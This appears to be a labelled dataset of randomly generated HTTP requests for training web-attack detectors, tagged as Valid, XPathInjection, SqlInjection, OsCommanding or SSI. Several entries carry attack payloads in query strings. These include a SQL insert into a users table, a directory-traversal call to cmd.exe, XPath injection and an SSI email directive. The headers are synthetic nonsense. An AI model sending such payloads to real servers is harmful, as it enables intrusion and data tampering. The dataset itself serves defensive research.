GET /aZvV/eWQDyTnh@SOBMQ@Y/oYHs8ibriexnihtt/l@6ToRdu9s4/oLZ480vbxXvPdO4c/vLoj1m_JZRWWbpaGJ.pl? HTTP/1.0
Host: www.tds8eAENc.com:80
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, deflate, deflate, identity;q=0.3
Accept-Language: *
Cache-Control: min-fresh=81173
Client-ip: 237.86.185.182
Cookie: 3PJ.oWYblogobjecti7=efz;l7rain5bs=nlunxY;LaInnnEe=6214;ctoean7ezoeft=7132612;a0mdatibae1nB4=8AZ.xSipK@PC;tk=sa_HkuZ@
Cookie2: $Version="29"
Date: Tue, 22 Apr 08 10:21:32 UTC
ETag: W/"rFsl@N.AdapEJzmyc4"
Expect: 100-continue
From: ts1wUaS@wxeiemthe.st
If-Modified-Since: Sat, 27 Feb 10 04:54:00 UTC
If-Unmodified-Since: Fri, 15 Apr 05 09:14:08 CET
If-Match: "u0VGMfFep54JiDg2Av"
If-None-Match: *
If-Range: Sun, 23 Aug 09 09:07:37 GMT
Max-Forwards: 85
MIME-Version: 6.7
Pragma: teg='eyaa8'
Proxy-Authorization: NTLM Z2NlSWx1YW1zaGQweGllY2UzYmNxeWlXc3hubTZucml0WnRUeWltZQ==
Authorization: Basic ZVNuanVleDpEZWZw
Range: 485874-76550,627253-,688763-0608
Referer: /feogttmB/nemrbo/odyntlp4.shtml
TE: chunked;q=0.5
Trailer: If-None-Match
User-Agent: oYJ68QKwr http://www.stjEeaqa.de
UA-CPU: PowerPC
UA-Disp: 040,6518,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 733x086
Via: 5.3 www.Oaaot.gif
Transfer-Encoding: deflate
Upgrade: u9iTI/6.5, 3wch/6.2, lNtre/1.1, oAhiht/7.8, 2iee/2.5
Warning: 403 www.1ernaeea.tiff "sB1ntt" "Thu, 29 Jan 04 19:12:54 UTC"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 2106773576
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26214
Start - Id: 49033
class: XPathInjection
GET /Ycicdtnoaeyvnnwteie/rj/edxpYzA3tKg/acxar@9VZC9SNtvar/tewhoNne8r7rc.js?t1id=hwifG5V02fAD&Lrr1u1so=nem&acyEed1r=tsilu%27%5D+++%7C++++P+++++%7C+++%2F%2Fuser%5B+++++name%2Ftext%28++++%29++++%3D+%27Wicn&Mst0bE=uneSn1veoddteee&ndeeonm1l=aI HTTP/1.0
Host: 16.70.53.150
Connection: keep-alive
Accept: */*
Accept-Charset: koi8, shift_jis, iso-8859-15, iso-8859-8, isiri-3342
Accept-Encoding: 
Accept-Language: ok-tt3iic, l-ocna;q=0.6, zwhkehn-scs8Xohr;q=0.3, po-Yts;q=0.6, ylo1-awrdeywc
Cache-Control: max-age=296
Client-ip: 244.105.2.96
Cookie: 8rkqt2R=sY6cDHCpC;imgJVI=heo;hrs=6zkXHi1;ndheo=h;bevalc;tiw;EmsAaealr=ad&o
Cookie2: $Version="246"
Date: Thu, 27 Nov 08 09:40:18 UTC
ETag: W/"HDpgVKTxy7BTIpjaMShy"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 05 Jun 05 22:51:42 CET
If-Unmodified-Since: Tue, 06 Jul 04 10:21:15 UTC
If-Match: "sTKGR4P0AoW3qO_Opg"
If-None-Match: "5RjGOh8LcKVKM5_F1h6"
If-Range: *
Max-Forwards: 7172
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Basic c3RoaXE6a3NlYw==
Range: -31
Referer: /nltPequ/1ewuqaOt/ncvenNA/inowesi.tar
TE: deflate;q=0.7,gzip;q=0.9
Trailer: Via
User-Agent: i2ttRc8oe9/9.1.2.9
UA-CPU: StrongARM
UA-Disp: 081,2723,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: gzip
Upgrade: sfltc/9.5, Llja/5.6
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49033
Start - Id: 35353
class: SqlInjection
GET /ttvrgQgIw-eYoEGk8b/isieepn3Me.jpeg?JA83C4JNL1=%2Bse&aU_Wwo7JHVn=zd%2F&eterzraynifhr=%3B+++++EXEC%28++%27INS%27%2B%27ERT+++INTO++users++++values%281731%2C%27i11ssutnlU%27%2C%27pme6%27++++%29%29&utolemr=206&9rarh=512&8mivm7t=d%3FE%3Bosy0n5stdin&isR0=lueae&OJdocumenta57KY.mC9=5785792555 HTTP/1.1
Host: www.9urNss6uf.cz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman, iso-8859-5
Accept-Encoding: identity;q=0.2, deflate;q=0.4, identity
Accept-Language: *;q=0.0
Cache-Control: max-age=7870
Client-ip: 85.208.223.94
Cookie: 0huZ9ekti=4536879550
Cookie2: $Version="914"
Date: Sun, 25 Feb 07 11:43:22 CET
ETag: W/"_UGz7wT0hbLk_psH8NC"
Expect: 100-continue
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Mon, 02 Jul 07 24:19:38 GMT
If-Unmodified-Since: Sat, 27 Oct 07 24:06:40 GMT
If-Match: *
If-None-Match: "Nns9@De.@jyn2R1tKb4"
If-Range: Sun, 28 Dec 08 21:02:19 GMT
Max-Forwards: 07
MIME-Version: 6.8
Pragma: sc='erAue'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: hoszw 8terEet=a94t
Range: 1609-18413
Referer: /apira5Se/hj7t/1srMln0/ois9tko/lcewtetn.fgf
TE: chunked
Trailer: Max-Forwards
User-Agent: eEBtydZgFs http://www.onoc3i.cz
UA-CPU: 68000
UA-Disp: 3189,7325,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: srz/6.5 218.40.5.106:2835
Transfer-Encoding: evtn; rnnyn5=5ugf3o
Upgrade: gerh/9.6
Warning: 607 30.81.200.157 "5nsed27OeHeodumid" "Wed, 10 Oct 07 05:59:44 GMT"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35353
Start - Id: 27613
class: Valid
GET /zVgfPQLiF1/X6Ie6terchild_P-s%u/7EUot30g.msf? HTTP/1.1
Host: 140.83.131.238:80
Connection: keep-alive
Accept: text/html;q=0.2, text/xml, image/gif
Accept-Charset: windows-1251
Accept-Encoding: 
Accept-Language: hsGsnhe-Eyrhqs, oyro-syooc
Cache-Control: no-cache
Client-ip: 70.6.137.206
Cookie: 5Hade=nIupdateg)[ste'w)<]ii7;meka=z/e=gsnodeoiayja4xei@) 
Cookie2: $Version="1"
Date: Tue, 10 Apr 07 12:28:14 GMT
ETag: "O5pwZFKgQL1aoTqJ"
Expect: 100-continue
From: 06wy8l@mtedC.de
If-Modified-Since: Mon, 12 Nov 07 06:39:07 UTC
If-Unmodified-Since: Wed, 23 Jan 08 03:35:59 CET
If-Match: "sskGDEsTKTMV-_leKUC"
If-None-Match: *
If-Range: Sat, 27 Aug 05 20:32:19 CET
Max-Forwards: 55
MIME-Version: 9.4
Pragma: nEoGet='lem'
Proxy-Authorization: NTLM dHRmdHRhb3JvYWVSbmVlZWRtdHNvb2RDOW50bnJlaW82dHdObjBlbA==
Authorization: Basic N2xsdW45aTpkaHNyNw==
Range: 741719-68217
Referer: http://www.ss24.com/9radsexq/yeeagx/ortl35mt.ace
TE: trailers,deflate,trailers
Trailer: Warning
User-Agent: n4etalx/6.2.8
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 794x6621
Via: 0.1 178.59.127.94
Transfer-Encoding: deflate
Upgrade: iro/0.9, dcset/6.0, xNs9ee/6.4, 9eaii/4.5, msw/6.6
Warning: 741 www.rweia.css "ro7ottxtixwG8b2" "Mon, 03 Nov 08 11:02:06 CET"
X-Forwarded-For: 177.184.78.1
X-Serial-Number: 189697977036477
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27613
Start - Id: 28612
class: Valid
GET /d2Fjgj/osa/aa-Lk@.STHO.aQBSonM/M2homeL/wysrlsu8ehoaeumh/ieJAUW.mspx?pedeohowdspne=02188404&lerutd=nnlreEi&oumNT.=4139&eso6ey7n5Tmt1=t+ehltt%2Fneinc&tarseogmnta=c2Trcopysfs&eo4rpfiynZe=9ecKa+&B1-_3Ui4t=Iexitao&fivHnhhexti=%3Aes HTTP/1.1
Host: www.bqrep.cz
Connection: 7jbh
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: fmNtIt-Wdeev;q=0.1, tso-D7tre;q=0.2, tlAia-n, tsuv2t-rtsaatjl;q=0.8, o2iaa-jesOc;q=0.4
Cache-Control: min-fresh=4688
Client-ip: 238.73.19.115
Cookie: e7eqoayddEt=8mjdrcp0a@e;ao=053;uonfttn=79;2srI2hisi=5395839090;q0WOOfAOl19.=588
Cookie2: $Version="8"
Date: Sun, 08 Feb 04 03:01:49 CET
ETag: "Ut7T1.9CiGlDSsjJF"
Expect: 100-continue
From: i3ltd@nsmTrto.cz
If-Modified-Since: Sun, 11 Jan 04 08:05:15 GMT
If-Unmodified-Since: Wed, 20 Jan 10 24:01:54 UTC
If-Match: "B44sQc4HiPuLC1I96O"
If-None-Match: "5.7tNNeo.W4gnENaw"
If-Range: "G8SGB8QPrWRbLjrJwc-"
Max-Forwards: 15
MIME-Version: 9.3
Pragma: ssn=w
Proxy-Authorization: Digest opaque="nteit8ao"
Authorization: 2hrdsa en5so=arlrae
Range: 4-8144
Referer: /nseeoOtb/nneftn/heye/etgjr.avi
TE: deflate
Trailer: If-Range
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 2.9; ia-be; rv:9.3.4) Gecko/84504728
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 379x210
Via: FTP/7.6 www.t7Lu.css:11
Transfer-Encoding: compress
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 313 www.acau.html "bckduh" "Wed, 09 Sep 09 19:22:50 CET"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 408007712667220
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28612
Start - Id: 43846
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.lrcz.gov
Connection: thweI
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mO-ofrggulA, n-NynXij, e-lrm, ikJrfil-tFtzneie;q=0.3
Cache-Control: max-stale
Client-ip: 85.189.85.166
Cookie: OePic0aui=dzotn;1FsK770kI4s=waoouansHm;icD9iml=tQy0-Fh;Lnull@5Bmk1netcatG=cstewetStiinph-ims;SFss2=)xaperl~dodre~Z1
Cookie2: $Version="07"
Date: Wed, 31 Mar 10 11:51:05 CET
ETag: "Z8MWlRyGtcSU.JT"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Thu, 06 Nov 08 24:34:59 CET
If-Unmodified-Since: Thu, 12 Feb 09 08:46:40 UTC
If-Match: "8QsYdjFUvqZ_QedTW"
If-None-Match: "oKzWEL5pjaNcyRwVY_Kb"
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 3
MIME-Version: 1.9
Pragma: aeriel='oyet9ss'
Proxy-Authorization: Basic bEx1ZWN0TjpudGFsZQ==
Authorization: Basic b2VUdXNldDpyMzVzOXM=
Range: 064373-124259,214-265,801-679
Referer: /8sh3.tiff
TE: trailers
Trailer: User-Agent
User-Agent: 9eeO (evi79wrTW_)
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: 1.6 www.niou.png:6
Transfer-Encoding: IaUt
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43846
Start - Id: 49564
class: XPathInjection
GET /i1lziZpac3/teneftoinTct/enQv-dMWqnA/ve9stcriteE6ytea6/oGnMiWYWJgiTs-V/aaoga29aistiL2ust/diHILMacxHRP06-.w/-.@faKqJXNLselectalln9/uBG5rDPemoAGz/ota/2eogsa/p@41.swf?d.UpositionS=9+++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++81095%3D&lSg99rcrecrbuT=2aehc HTTP/1.0
Host: 226.240.254.73
Connection: close
Accept: image/*;q=0.4, audio/x-wav;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.1, compress
Accept-Language: RarbAb-es03s;q=0.7, e9ssdia-Apn7;q=0.1
Cache-Control: no-store
Client-ip: 229.72.228.0
Cookie: NshutdownZhP=8562;Fttr6eh1wlw2iI=991065
Cookie2: $Version="6"
Date: Fri, 14 Dec 07 19:08:14 UTC
ETag: "1XNKuhfoY0xpvjB27"
Expect: tIeh=qs8napHi
From: no50tll@eaFr3e.cz
If-Modified-Since: Mon, 19 Sep 05 17:29:16 UTC
If-Unmodified-Since: Wed, 30 Nov 05 24:18:47 CET
If-Match: "lpF8capJ.Z..ZT57N"
If-None-Match: *
If-Range: *
Max-Forwards: 66
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: 9a2ilt dswfus7=iredewem
Authorization: NTLM aGp5aGhvYXQzbHphZm5jYWVuZW9vcmlsNnRKaXNpc3RlZWFhaXJFcmVtaWhz
Range: 8-,588-
Referer: http://nweeacEl.fr/c6ruoa/souatt/en7E2d.exe
TE: gzip,gzip;q=0.6
Trailer: Range
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 2.1; 8s-mW; rv:3.8.2) Gecko/66210657
UA-CPU: Sparc
UA-Disp: 174,775,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: 9.4 www.rossisnc.tiff:356, 3.0 www.renbz1Ea.tiff
Transfer-Encoding: compress
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 4750592519886658439
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49564
Start - Id: 26577
class: Valid
GET /tIt.cgi?tc9hiAelvecjtsa=3opeE3rOyvaccess_log&nno=337&ejo7im7oSo=4530622&w3eI1beeScstee=tQ_NM-x_c60&ekw=9TBzS HTTP/1.0
Host: 240.216.74.41
Connection: keep-alive
Accept: image/png;q=0.3, audio/basic, application/postscript
Accept-Charset: x-mac-ce;q=0.9, windows-1258, iso-8859-5;q=0.8, hz-gb-2312;q=0.3, windows-1252;q=0.6
Accept-Encoding: *
Accept-Language: a-nxetif, msthmo-dhgsm;q=0.8, l-dlea;q=0.5, l-Mza1are;q=0.0
Cache-Control: only-if-cached
Client-ip: 126.247.210.228
Cookie: dkoretum=ajthmk2sa9scwu;hewrnrd=pce;7kjshAetmwosh=5;sWe=uxdohtsetNsndf
Cookie2: $Version="24"
Date: Mon, 01 Aug 05 17:34:18 CET
ETag: "UjXcJTffLNTV4eC5Kw-"
Expect: seocoz2l
From: ndorli@calYa.it
If-Modified-Since: Sun, 10 Apr 05 13:26:28 GMT
If-Unmodified-Since: Sat, 11 Mar 06 22:23:00 GMT
If-Match: *
If-None-Match: "BF7fAdkd8Imf3orGu"
If-Range: Fri, 08 Sep 06 16:06:54 CET
Max-Forwards: 9727
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://sniw.net/oseoo/7nuds5/tfhcgi.wmn
Authorization: ddeh7e orhhtmn=loo5dese
Range: 5377-633943,-28808
Referer: /ucpei/2hieesa.mp3
TE: gzip,chunked;q=0.6
Trailer: Accept-Language
User-Agent: tltmSis
UA-CPU: Sparc
UA-Disp: 0886,5567,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6083x8354
Via: HTTP/8.7 www.o2ms.jpeg, 1.8 119.164.82.57:88982, HTTP/1.6 94.114.253.191
Transfer-Encoding: dTfl
Upgrade: fmyf/7.7, s17U/8.8, yna/1.4, uaae/7.2, crI/4.0
Warning: 032 www.oghexy5t.html "njwthy" 
X-Forwarded-For: 14.228.155.87
X-Serial-Number: 693373977262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26577
Start - Id: 39367
class: SSI
GET /jrrtjarnlkhont/tUAmKbWxLmdasfLwDM-/eIndr09/rtWQjkR2PjqCqP/awmGhrS./nAT2dbPtpMoye/kinF@uk_LsV/ecsdfmiD/u0/hS4DV3uFnbQOR.exe?XvvFU5=nu&Zxa=lOk&mcuehsaut0t=ern&uoa2uet=140121492&hnnSaes=eae&twleo=%3C%21--%23email+fromhost%3D%22www.yJeweEac.com%22+tohost%3D%22mailbox.hil.com%22+message%3D%22tLxb+os6nrdf+7ntt+fnhen%22+fromaddress%3D%22niXlti.com%22+toaddress%3D%22ynu63.yhadu.com%22+subject%3D%225%22+sender%3D%22em.com%22+replyto%3D%22pamo7oi.com%22+cc%3D%22bi%22+inreplyto%3D%229eV+ejt+Sdbi%22+id%3D%22foPrmail%22+--%3E&1Oltiii5eko=72394231&y9AoTutdaepcpmT=8700&aslly34o=iposition&iooufAeRolnnar9=0dandr+ HTTP/1.1
Host: www.eOihni.be:3
Connection: obse
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.8, deflate;q=0.4, gzip;q=0.7, deflate
Accept-Language: SvOegn-qyaoewe, EotmOe-wnuitotf;q=0.0, foue-enrielo;q=0.3, it684-naf, staroe-eoi4;q=0.1
Cache-Control: min-fresh=2890
Client-ip: 45.135.150.208
Cookie: esos1=5290;deleteun-RgdrmR=o87ifAetct;yoslDulIk=eecrss;yn5wrunz=esdmrn;nder=Riamd;dtgtrfcuakhn=595956
Cookie2: $Version="92"
Date: Wed, 18 Feb 09 24:25:27 CET
ETag: "otK3._w2Ir0715BPHo"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Fri, 08 Oct 04 01:48:34 CET
If-Match: "s_rijUdpadsKgul"
If-None-Match: *
If-Range: Wed, 20 Feb 08 08:46:09 UTC
Max-Forwards: 0995
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic em5ldHNsZTplTXRuT3Jvdg==
Authorization: Digest nonce
Range: 3517-0,7-1
Referer: http://www.lhege.ch/vethmaqS/1tsn/nzscaeI/u2he/alrh.png
TE: chunked,deflate,deflate
Trailer: Accept
User-Agent: Mozilla/9.2 (X11; U; Linux i586 5.2; ta-eH; rv:8.7.6) Gecko/58229794
UA-CPU: 68000
UA-Disp: 071,646,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: xreL0d/3.3 167.25.194.12:65, nus/6.4 www.2nwrn.css, 1.0 www.ttkbo.htm:16301
Transfer-Encoding: compress
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 93635281760343064416
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39367
Start - Id: 6296
class: Valid
POST /tEz.bin? HTTP/1.0
Content-Length: 86
Content-Language: zmbeibb
Content-Encoding: deflate
Content-Location: http://ftoi.it/icRb.msf
Content-MD5: U2U3ZUVpUmxjQXludHBpcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Oct 05 14:31:42 UTC
Last-Modified: Fri, 20 Feb 09 18:54:43 CET
Host: www.tocgel.fr
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: Ri-cvxca, dt-ndo, snt-nuOpcHit;q=0.3, hhh6-Ylat, mhrtibae-ei7
Cache-Control: no-cache
Client-ip: 39.82.132.80
Cookie: cnlDI=e oj$nawboot.ini
Cookie2: $Version="1"
Date: Sat, 19 Jan 08 07:32:50 GMT
ETag: W/"CRrlvqSg_oS8jZDr"
Expect: 100-continue
From: eOapi@ngtn7he.gov
If-Modified-Since: Thu, 15 Oct 09 21:15:58 CET
If-Unmodified-Since: Sat, 21 Aug 04 21:22:20 UTC
If-Match: *
If-None-Match: *
If-Range: "UAvRVQ6klvJfcGp"
Max-Forwards: 922
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic ZGlpcm1uc3Q6eG5zaGxtaA==
Authorization: Digest algorithm=MD5
Range: 10-,-849357
Referer: /ehtsn/cgtt.htm
TE: trailers,chunked;q=0.2,trailers
Trailer: From
User-Agent: tolh1rTr
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 475x5862
Via: 8.7 248.3.164.3
Transfer-Encoding: deflate
Upgrade: d8e5it/2.2, jr4e/7.0, easd/8.8, rOfnn/0.5, NeOe/4.5
Warning: 155 www.3r0o.gif "onb5edtw" "Tue, 10 Oct 06 03:14:15 UTC"
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3beth4ceh5in9ei=ndm&an=Wrt&PyRH5=62&fZNvqVdKuk=eoauD&yhtherrtt=089&hE9tmTl1gstc2=rUj8f

End - Id: 6296
Start - Id: 16390
class: Valid
GET /6Kt/y@_orOA6ddPKbPRY/irYb_.2TAxLt0elqqq-.aspx?8ex=na4nhyrh7uo&eeth0l3it1=nm&dsSits8=3&he=g5boeldon-+tlnloul%28&tmud2ruiv=tSep3HfG5&TxuSetmjg3uevhe=tp..jq1_&roeaDpsd=llt&yhe4a=idF&tef=ryc&CdphomeG=sfe&landodtLn4y=gb HTTP/1.1
Host: www.dEa7lDmm.net:80
Connection: rrGmam
Accept: text/html
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: cgf-en2is7eg;q=0.3, hthrSEa-Eebyr1;q=0.7
Cache-Control: max-stale
Client-ip: 47.227.109.121
Cookie: aahklwotila=Om;ldiitrstdweo=xjwhn]bou;hrnrsYu=f;r;ku8ht4Imadte=i/ 5n;rpo0n=gdneloeypl1fLn;lw8anonAi=cnatieP
Cookie2: $Version="194"
Date: Fri, 24 Nov 06 10:06:28 UTC
ETag: W/"iU@OCIQz7G.@o5g"
Expect: tmfps
From: piRire@gfja0tm2d.be
If-Modified-Since: Tue, 06 Sep 05 12:35:01 CET
If-Unmodified-Since: Sun, 05 Nov 06 10:15:59 GMT
If-Match: *
If-None-Match: "0Li-R5K8QX3bIEPeUw-"
If-Range: Tue, 23 Jun 09 05:11:52 CET
Max-Forwards: 7641
MIME-Version: 2.3
Pragma: a8ame4=pbi
Proxy-Authorization: ihnaT sR5Ne4c=iwllit
Authorization: NTLM OWtWb2J0SGFwSUFIbGVsZWdycmt3dTFBNG1lbnN0czl0dA==
Range: -652120,9-,091-
Referer: http://www.a8ie1ys7.com/t9EsjLen/5OlvsaS/pctessXM.avi
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 7.1; ir-hj; rv:8.3.8) Gecko/49841479
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8564x328
Via: FTP/5.5 14.98.1.99, 1.1 www.jxejpe.htm
Transfer-Encoding: o8mr; myqOuoe=nttocf
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 010 www.noeeAYy8.jpg "hmgaMcnRtJse0cr" 
X-Forwarded-For: 35.90.162.224
X-Serial-Number: 87401
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16390
Start - Id: 14895
class: Valid
GET /xptceEEnalnttrse/yPiAG3o_H/Mb/hnItpi7d6twP4/iJ@c/n.N/dLk.znc6PPBRycQ1ZDE/eU.exe?eeowigvr9niEal=ai&aeit=ovtOun&w7zKhand_54=cX0HeSY0&tpzv=461537&ldpmtontro=39765056&hqs5=0haunionmfgaEbrRa&1Y.h2VpXHf=+group+byat&9ryeimj=ha&CLlmimg=4599351&D-qM@SA.ALf=grhl9es9a HTTP/1.1
Host: www.dN9orn.cz:80
Connection: close
Accept: application/zip;q=0.4, audio/x-wav;q=0.9, application/postscript;q=0.0
Accept-Charset: x-mac-roman, utf-8, windows-1250, iso-8859-1;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: ns-amm;q=0.9, ioegio-dh, 0oniAe-gr9A
Cache-Control: no-transform
Client-ip: 199.117.134.44
Cookie: e6ecolhgtctt=  
Cookie2: $Version="82"
Date: Sat, 13 Jun 09 11:52:45 GMT
ETag: W/"HIwSC0gk7EGhOBTr"
Expect: lziantcs
From: ugwyeac@ddrrnet.uk
If-Modified-Since: Sat, 09 Jun 07 13:53:45 UTC
If-Unmodified-Since: Sat, 24 Apr 04 05:03:02 CET
If-Match: "bENL25l1IoohnsMZ-DJr"
If-None-Match: "b0UZgWZar7_nvWLAf.U"
If-Range: *
Max-Forwards: 1
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXhpZXN1ZWdxZXR1OW5lZXJhYWFraVp1dXBzYWhlZG53bGRyb2Zm
Authorization: NTLM Y2llcnNvaXk2b2ZmYjduYm5udEllOHdtZWVVcndoZG9UYWw=
Range: 614-,0-6202
Referer: /iphdntl/frlp/nqoie.jpg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.5 (X11; U; Solaris 5.6; 4y-3k; rv:1.0.9) Gecko/14323840
UA-CPU: 68000
UA-Disp: 3105,545,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6967x560
Via: e6eoW/1.6 www.r2iaj.js, 3.5 101.41.6.255, eoou/4.2 www.TBs7sre.html
Transfer-Encoding: enoltt; mlDint=nfjssah
Upgrade: ed3tT/7.9, 3Ifeie/2.1, etw/3.8, thenvr/4.1
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14895
Start - Id: 20231
class: Valid
GET /2y/cYY2kZ99i6vgRh76/ebSOlUQ4soRoiwg8eeuw/ikpdnntIl4mapmei/la.nsf? HTTP/1.0
Host: www.eam1gEiocr.it:6334
Connection: ahrsct1e
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, gzip, gzip;q=0.8
Accept-Language: kiatawl-9s;q=0.0
Cache-Control: no-transform
Client-ip: 166.77.35.223
Cookie: c3dlo=6491704;3Eboot.inihFJ@rE=hiAHB-;Eaptremo8t6s=9ohtacceszk;PRZbZElMN=ae0w=wo3Dinclude1dnodea;QMBO.0=7209;atfoumc0=iat4t
Cookie2: $Version="26"
Date: Tue, 08 Apr 08 03:55:03 CET
ETag: W/"0PybIzozC7n.EMn"
Expect: nis9mYn
From: it1srqa@sine8.fr
If-Modified-Since: Sun, 04 Jun 06 18:39:15 UTC
If-Unmodified-Since: Sun, 26 Apr 09 14:15:42 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 11 May 06 19:06:31 UTC
Max-Forwards: 0383
MIME-Version: 0.1
Pragma: i='rn1tRo'
Proxy-Authorization: NTLM aGhqb3NydGVobjZhdFhBMW90ZGtydDNyMmNFb2liSW5idG9uYUF5YmVjb2Vo
Authorization: Digest nc=DfBe6Eb5
Range: 8-0,-1872,-4
Referer: /sr98ghwl/9agnwTO/ie7Reta/5oasqnH/aomlu.swf
TE: gzip;q=0.0,trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/0.5 (Windows; U; Win98 3.0; ye-ca; rv:7.4.4) Gecko/97825316
UA-CPU: 68000
UA-Disp: 7522,1953,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4940x047
Via: ttqln/6.9 210.25.46.203, FTP/8.3 44.91.125.89
Transfer-Encoding: gzip
Upgrade: ehild/2.2, sbuaee/6.5, o2oe/9.8, eape/2.8
Warning: 624 80.190.32.100 "nxwnhoRO2aeltetuvxd6" "Fri, 14 Apr 06 17:56:57 GMT"
X-Forwarded-For: 210.165.164.74
X-Serial-Number: 554046996797250
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 20231
Start - Id: 19687
class: Valid
